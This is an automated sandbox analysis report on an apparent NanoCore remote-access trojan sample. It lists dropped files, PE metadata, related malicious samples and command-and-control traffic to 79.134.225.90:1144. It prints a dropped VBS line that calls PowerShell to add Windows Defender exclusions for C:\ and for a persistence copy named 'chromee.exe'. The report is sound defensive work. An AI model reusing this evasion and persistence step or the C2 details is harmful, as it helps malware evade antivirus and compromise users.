FINK-TELECOM-SERVICESCH	0jyrU2E05S.exe	Get hash	malicious	Browse	79.134.225.72
	kyIfnzzg3E.exe	Get hash	malicious	Browse	79.134.225.90
	Ref 0180066743.xlsx	Get hash	malicious	Browse	79.134.225.90
	MS2106071066.exe	Get hash	malicious	Browse	79.134.225.71
	Kangean PO.doc	Get hash	malicious	Browse	79.134.225.72
	facture.jar	Get hash	malicious	Browse	79.134.225.69
	c3yBu1IF57.exe	Get hash	malicious	Browse	79.134.225.92
	DPSGNwkO1Z.exe	Get hash	malicious	Browse	79.134.225.25
	SecuriteInfo.com.Trojan.Win32.Save.a.16917.exe	Get hash	malicious	Browse	79.134.225.94
	AedJpyQ9lM.exe	Get hash	malicious	Browse	79.134.225.90
	H538065217Invoice.exe	Get hash	malicious	Browse	79.134.225.9
	Purchase Order Price List.xlsx	Get hash	malicious	Browse	79.134.225.90
	P.I-84512.doc	Get hash	malicious	Browse	79.134.225.41
	l00VLAF9y0xQ9Vr.exe	Get hash	malicious	Browse	79.134.225.92
	Swift [ref QT #U2013 2102001-R2]pdf.exe	Get hash	malicious	Browse	79.134.225.10
	PO756654.exe	Get hash	malicious	Browse	79.134.225.99
	qdFDmi3Bhy.exe	Get hash	malicious	Browse	79.134.225.90
	br.exe	Get hash	malicious	Browse	79.134.225.73
	Yeni sipari#U015f _WJO-001, pdf.exe	Get hash	malicious	Browse	79.134.225.71
	as.exe	Get hash	malicious	Browse	79.134.225.73

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ZVFVY7NwZ7.exe.log Download File
Process:	C:\Users\user\Desktop\ZVFVY7NwZ7.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	847
Entropy (8bit):	5.35816127824051
Encrypted:	false
SSDEEP:	24:ML9E4Ks2wKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7a:MxHKXwYHKhQnoPtHoxHhAHKzva
MD5:	31E089E21A2AEB18A2A23D3E61EB2167
SHA1:	E873A8FC023D1C6D767A0C752582E3C9FD67A8B0
SHA-256:	2DCCE5D76F242AF36DB3D670C006468BEEA4C58A6814B2684FE44D45E7A3F836
SHA-512:	A0DB65C3E133856C0A73990AEC30B1B037EA486B44E4A30657DD5775880FB9248D9E1CB533420299D0538882E9A883BA64F30F7263EB0DD62D1C673E7DBA881D
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	14734
Entropy (8bit):	4.993014478972177
Encrypted:	false
SSDEEP:	384:cBVoGIpN6KQkj2Wkjh4iUxtaKdROdBLNXp5nYoGib4J:cBV3IpNBQkj2Lh4iUxtaKdROdBLNZBYH
MD5:	8D5E194411E038C060288366D6766D3D
SHA1:	DC1A8229ED0B909042065EA69253E86E86D71C88
SHA-256:	44EEE632DEDFB83A545D8C382887DF3EE7EF551F73DD55FEDCDD8C93D390E31F
SHA-512:	21378D13D42FBFA573DE91C1D4282B03E0AA1317B0C37598110DC53900C6321DB2B9DF27B2816D6EE3B3187E54BF066A96DB9EC1FF47FF86FEA36282AB906367
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	22148
Entropy (8bit):	5.6032477905053035
Encrypted:	false
SSDEEP:	384:CtCDLq0D01mp9lro0rvHcOYSBKQulJIai7V9wWSJUeRu1BMkmNZ1AV7ObWT+564u:R59lroCBY4KQulJ1RWXet346zu
MD5:	8496AB6417CE1A827983CF75D1766111
SHA1:	00F94AE48032DDA9B613E657D36948841FB6861B
SHA-256:	162E0F40330B89C783DE280CF40134BBE1A4E653F89B2D4802E242C95BA950FA
SHA-512:	1FFB57D1D1A429B9C87A33D730D55A45A397C4109D38E44BB1C938F907CB4E0E4D4E09A5DA7BA483EF0E7362B9DAE0FA207C0F4FDBF51A14C85941010C85C4CA
Malicious:	false
Reputation:	low
Preview:	@...e...........Y...........<.-.......G.5............@..........H...............<@.^.L."My...::..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe Download File
Process:	C:\Users\user\Desktop\ZVFVY7NwZ7.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	662016
Entropy (8bit):	7.9894013878846275
Encrypted:	false
SSDEEP:	12288:ETQ2c25dc9wH6UvJF0nvekN2rDerJDTQsKIU9JDAccU7jYUL1Xk:52oWksqla711Xk
MD5:	8E87DE15CD3DA1245B9C7B0E48C0F126
SHA1:	80830909EC859ED61811329AE16888CB87E1ED5F
SHA-256:	EC850202F17A8E7F5A04603E9C70AB21D7B39FB3142A79098AEF1D592974702E
SHA-512:	236BDCAE21D29DF979BFEDF650B23FEA04BEBABD4EB79B172D9E4AC2A602494727338E3937C9F9F371DBF0FF78E457BEE138C9A7FDE6351ED9A205888E4EA44A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...'................0.................. ... ....@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H.......x7.../......:...xf................................................{....J8......}....8.......{....6..}....8......z8......(....8......(....8.....&~..........~.......{....6..}....8........{....J8......}....8.....z8......(....8......(....8.....&~..........~.......{....6..}....8........{....6..}....8......f..(....8......(....8......&~..........~.......{....J8......}....8.......{....J8......}....8.....z8......(....8......(....8.....&~..........~..

C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe:Zone.Identifier Download File
Process:	C:\Users\user\Desktop\ZVFVY7NwZ7.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Temp\_Lzqtfofnnzmk.vbs Download File
Process:	C:\Users\user\Desktop\ZVFVY7NwZ7.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	183
Entropy (8bit):	5.011522109824809
Encrypted:	false
SSDEEP:	3:FER/n0eFHgSSJJFkBBVIceGAFddGeWLCXknRAuWXp5cViEaKC5SufyM1K/RFofDe:FER/lFHsQdeGgdEYmRAuWXp+NaZ5SuHm
MD5:	B1B51D4DF85A59A665A8BDB96E5018CF
SHA1:	0F6FE802C29633E900FF2C59A58B759B1DFF01BF
SHA-256:	975B377F5BFECD9542B801DDA6831BD44CCFF88F8C804D3FF42B2161C07A8075
SHA-512:	665151289DDA2AEF11C3626F4DEDBB6D8908898BC25F4AF1D4E91D1B787245D56A3EA82F07BB7C743ADAB5F7D218F5DD7C9C62F3438405CB15CCF27864E1B271
Malicious:	true
Reputation:	low
Preview:	CreateObject("WScript.Shell").Run "powershell Add-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\chromee\chromee.exe'", 0, False

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jef2jh0v.dlt.psm1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jorb5u2s.hyr.ps1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\catalog.dat Download File
Process:	C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe
File Type:	data
Category:	dropped
Size (bytes):	1728
Entropy (8bit):	7.012278113302776
Encrypted:	false
SSDEEP:	48:IkR5lkR5lkR5lkR5lkR5lkR5lkR5lkR5i:xwwwwwwwk
MD5:	C7F4F5E1BE880A59E49249005C1E301D
SHA1:	EF2AAE2EA249910F3F61B363A7DD0AF70EFE6448
SHA-256:	F7E2318D515B382C2100F5B11F89C7B62B6E75AB8AEE9F684BDFAAF28195858D
SHA-512:	0DFF549B01A00BEE1AF1775AAA551B1DDC9AE7929CE401515956A5F2A6E112F0CCBD78BC3281442DD682CE6F7DD3A467A6E7458BB600D583FF90B13E8A7810E2
Malicious:	false
Preview:	Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h.P.vY.........S.5.6.C4..E.Y.\|........).zs...w.gl..\.G..J.M.vES.0....P.:..6...T....+5.1............r.P.V..+..(.2d.f... ..q.. 7iO.+..c.....!.'...mL\|XGj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h.P.vY.........S.5.6.C4..E.Y.\|........).zs...w.gl..\.G..J.M.vES.0....P.:..6...T....+5.1............r.P.V..+..(.2d.f... ..q.. 7iO.+..c.....!.'...mL\|XGj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h.P.vY.........S.5.6.C4..E.Y.\|........).zs...w.gl..\.G..J.M.vES.0....P.:..6...T....+5.1............r.P.V..+..(.2d.f... ..q.. 7iO.+..c.....!.'...mL\|XGj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h.P.vY.........S.5.6.C4..E.Y.\|........).zs...w.gl..\.G..J.M.vES.0....P.:..6...T....+5.1............r.P.V..+..(.2d.f... ..q.. 7iO.+..c.....!.'...mL\|XGj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h.P.vY.........S.5.6.C4..E.Y.\|........).zs...w.gl..\.G..J.M.vES.0....P.:..6..

C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat Download File
Process:	C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe
File Type:	ISO-8859 text, with no line terminators
Category:	dropped
Size (bytes):	8
Entropy (8bit):	3.0
Encrypted:	false
SSDEEP:	3:FcBO8:m48
MD5:	E471DF101ED8DA84A64E823BF7403022
SHA1:	339749BEE39C1AA31386305E2218344B50D106A8
SHA-256:	DA4A09868C322C15D6042F046B60E1FC57D96A1AD055DF1CD79C114B1849C3A3
SHA-512:	3BF4945E5AECCAF5C82671755B152B797B516D527DC0E58F5FCBD9CD755837D41AAA88B99D4433F086EDF024D8A1FB59D14880920645A2E66FBED7DE74B2D625
Malicious:	true
Preview:	..9.q+.H

C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\settings.bak Download File
Process:	C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe
File Type:	data
Category:	dropped
Size (bytes):	24
Entropy (8bit):	4.501629167387823
Encrypted:	false
SSDEEP:	3:9bzY6oRDIvYk:RzWDI3
MD5:	ACD3FB4310417DC77FE06F15B0E353E6
SHA1:	80E7002E655EB5765FDEB21114295CB96AD9D5EB
SHA-256:	DC3AE604991C9BB8FF8BC4502AE3D0DB8A3317512C0F432490B103B89C1A4368
SHA-512:	DA46A917DB6276CD4528CFE4AD113292D873CA2EBE53414730F442B83502E5FAF3D1AE87BFA295ADF01E3B44FDBCE239E21A318BFB2CCD1F4753846CB21F6F97
Malicious:	false
Preview:	9iH...}Z.4..f..J".C;"a

C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\settings.bin Download File
Process:	C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	5.320159765557392
Encrypted:	false
SSDEEP:	3:9bzY6oRDIvYVsRLY6oRDT6P2bfVn1:RzWDIfRWDT621
MD5:	BB0F9B9992809E733EFFF8B0E562CFD6
SHA1:	F0BAB3CF73A04F5A689E6AFC764FEE9276992742
SHA-256:	C48F04FE7525AA3A3F9540889883F649726233DE021724823720A59B4F37CEAC
SHA-512:	AE4280AA460DC1C0301D458A3A443F6884A0BE37481737B2ADAFD72C33C55F09BED88ED239C91FE6F19CA137AC3CD7C9B8454C21D3F8E759687F701C8B3C7A16
Malicious:	false
Preview:	9iH...}Z.4..f..J".C;"a9iH...}Z.4..f.~a........~.~.......3.U.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\chromee\chromee.exe Download File
Process:	C:\Users\user\Desktop\ZVFVY7NwZ7.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	662016
Entropy (8bit):	7.9894013878846275
Encrypted:	false
SSDEEP:	12288:ETQ2c25dc9wH6UvJF0nvekN2rDerJDTQsKIU9JDAccU7jYUL1Xk:52oWksqla711Xk
MD5:	8E87DE15CD3DA1245B9C7B0E48C0F126
SHA1:	80830909EC859ED61811329AE16888CB87E1ED5F
SHA-256:	EC850202F17A8E7F5A04603E9C70AB21D7B39FB3142A79098AEF1D592974702E
SHA-512:	236BDCAE21D29DF979BFEDF650B23FEA04BEBABD4EB79B172D9E4AC2A602494727338E3937C9F9F371DBF0FF78E457BEE138C9A7FDE6351ED9A205888E4EA44A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...'................0.................. ... ....@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H.......x7.../......:...xf................................................{....J8......}....8.......{....6..}....8......z8......(....8......(....8.....&~..........~.......{....6..}....8........{....J8......}....8.....z8......(....8......(....8.....&~..........~.......{....6..}....8........{....6..}....8......f..(....8......(....8......&~..........~.......{....J8......}....8.......{....J8......}....8.....z8......(....8......(....8.....&~..........~..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\chromee\chromee.exe:Zone.Identifier Download File
Process:	C:\Users\user\Desktop\ZVFVY7NwZ7.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\Documents\20210609\PowerShell_transcript.585948.u328TzvM.20210609111113.txt Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	5985
Entropy (8bit):	5.402422714094943
Encrypted:	false
SSDEEP:	96:BZ2uhTN/iqDo1Zog/ZhhTN/iqDo1ZlQ6IjZrhTN/iqDo1Zf944NZq:Y
MD5:	05A8E500125FEEE93AADE0A7C34094DB
SHA1:	1A03B7A62033BBB1E5EF38CEA7690AA6E1FFB108
SHA-256:	2AF2DEBB3DC2A0EF09C5B8598B4A87B8CF88DA50B9A863B31953AD8E43898A73
SHA-512:	DEA849ECC102B52C931BAEA33FC8F46E786CCFEA400187F99D91CA3D909AC360CCFBD67FB94D0B003D981982353358167701F6705F1195F7B8555226EFFE7DA4
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20210609111125..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 585948 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\chromee\chromee.exe'..Process ID: 3016..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20210609111125..******************..PS>Add-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\chromee\chromee.exe'..********************..Windows PowerShell transcript st

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.9894013878846275
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	ZVFVY7NwZ7.exe
File size:	662016
MD5:	8e87de15cd3da1245b9c7b0e48c0f126
SHA1:	80830909ec859ed61811329ae16888cb87e1ed5f
SHA256:	ec850202f17a8e7f5a04603e9c70ab21d7b39fb3142a79098aef1d592974702e
SHA512:	236bdcae21d29df979bfedf650b23fea04bebabd4eb79b172d9e4ac2a602494727338e3937c9f9f371dbf0ff78e457bee138c9a7fde6351ed9a205888e4ea44a
SSDEEP:	12288:ETQ2c25dc9wH6UvJF0nvekN2rDerJDTQsKIU9JDAccU7jYUL1Xk:52oWksqla711Xk
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...'.*...............0.................. ... ....@.. .......................`............@................................

File Icon


Icon Hash:	10b060d8e070b000

Static PE Info

General
Entrypoint:	0x4a1eee
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0xBF2AF027 [Thu Aug 20 02:10:47 2071 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xa1ea0	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xa2000	0x15f8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xa4000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x9fef4	0xa0000	False	0.990547180176	data	7.99463093072	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0xa2000	0x15f8	0x1600	False	0.431640625	data	5.40076952317	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xa4000	0xc	0x200	False	0.044921875	data	0.101910425663	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0xa2130	0x568	GLS_BINARY_LSB_FIRST
RT_GROUP_ICON	0xa2698	0x14	data
RT_VERSION	0xa26ac	0x2f2	data
RT_MANIFEST	0xa29a0	0xc55	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright
Assembly Version	1.0.1508.40811
InternalName	aww.exe
FileVersion	1.0.1508.40811
CompanyName
LegalTrademarks
Comments
ProductName
ProductVersion	1.0.1508.40811
FileDescription
OriginalFilename	aww.exe

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
06/09/21-11:11:14.736138	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49727	1144	192.168.2.3	79.134.225.90
06/09/21-11:11:21.395950	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49732	1144	192.168.2.3	79.134.225.90
06/09/21-11:11:28.259042	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49733	1144	192.168.2.3	79.134.225.90
06/09/21-11:11:35.554623	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49734	1144	192.168.2.3	79.134.225.90
06/09/21-11:11:42.576920	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49735	1144	192.168.2.3	79.134.225.90
06/09/21-11:11:49.577258	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49738	1144	192.168.2.3	79.134.225.90
06/09/21-11:11:56.550233	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49742	1144	192.168.2.3	79.134.225.90
06/09/21-11:12:03.578127	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49743	1144	192.168.2.3	79.134.225.90
06/09/21-11:12:09.564033	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49744	1144	192.168.2.3	79.134.225.90

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 9, 2021 11:11:14.027175903 CEST	49727	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:14.251687050 CEST	1144	49727	79.134.225.90	192.168.2.3
Jun 9, 2021 11:11:14.251858950 CEST	49727	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:14.736138105 CEST	49727	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:14.994498014 CEST	1144	49727	79.134.225.90	192.168.2.3
Jun 9, 2021 11:11:14.994712114 CEST	49727	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:15.017469883 CEST	1144	49727	79.134.225.90	192.168.2.3
Jun 9, 2021 11:11:15.122262955 CEST	49727	1144	192.168.2.3	79.134.225.90
